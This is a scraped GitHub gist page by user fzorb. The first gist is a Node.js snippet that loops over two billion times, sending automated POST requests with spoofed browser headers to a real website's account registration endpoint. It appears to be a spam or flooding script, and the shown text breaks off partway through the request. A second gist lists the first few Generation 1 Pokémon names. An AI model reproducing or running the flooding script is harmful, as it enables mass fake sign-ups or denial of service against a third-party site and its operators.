Skip to content

Instantly share code, notes, and snippets.

View fzorb's full-sized avatar
🏠
Working from home

FzOrb fzorb

🏠
Working from home
View GitHub Profile
const fetch = (...args) => import('node-fetch').then(({default: fetch}) => fetch(...args));
for(let i = 0; i < 2147483647; i++){
fetch("https://www.detrimo.com/account/register/submit.php", {
"headers": {
"accept": "*/*",
"accept-language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7",
"content-type": "application/x-www-form-urlencoded; charset=UTF-8",
"sec-ch-ua": "\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"102\", \"Google Chrome\";v=\"102\"",
"sec-ch-ua-mobile": "?0",
@fzorb
fzorb / gen_1_pokemon
Created June 3, 2022 05:15
all the gen 1 pokemon
Bulbasaur
Ivysaur
Venusaur
Charmander
Charmeleon
Charizard
Squirtle
Wartortle
Blastoise
Caterpie